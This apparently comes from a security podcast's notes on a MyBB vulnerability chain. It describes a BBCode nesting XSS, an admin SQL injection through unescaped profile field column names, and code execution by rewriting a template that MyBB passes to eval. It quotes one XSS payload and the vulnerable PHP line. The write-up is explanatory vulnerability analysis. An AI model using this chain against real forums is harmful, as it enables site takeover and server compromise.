[MyBB] BBCode XSS to Admin SQL Injection to Code Injection Chain

We discussed this vulnerability during Episode 183 on 30 January 2023

BBCode XSS chained with an admin panel SQL injection for potential for code execution.


The XSS uses a trick we’ve talked about before (episode 109) which is the idea of unexpected nesting.

[email][email= onpointerover=alert()//]text[/email]

in this case nesting an [email] tag within the email attribute of the [email] tag. When rendered, you get the normal HTML rendering of the inner [email] tag reflected inside of the href attribute. Since that normal rendering would include " it is able to breakout of the href attribute and inject a new onpointerover attribute containing JavaScript.

I’m not sure if the missing [/email] from the above payload is essential or just a side-effect of the fact it was fuzzer generated.

SQL Injection

The user search functionality is able to search custom profile fields, to accomplish this a set of key/value pairs are sent in as an array named profile_fields each key in this array is a column name, and the value is the value to be matched by the search. Unfortunately for MyBB the column names are not properly escaped before being used in the final query.

$userfield_sql .= ' AND '.$db->escape_string($column)." != ''";

It uses the escape_string method, but the value is not going into a string inside of the SQL statement. So one can easily inject other SQL keywords and change the semantics of the query.

Code Execution

If the SQL engine being used supports sending multiple queries then it becomes possible to turn this SQL injection into command execution. The template for a profile signature is passed into eval. So by sending a query update the member_profile_signature template one could inject into the eval call and have their own PHP executed when the template is evaluated.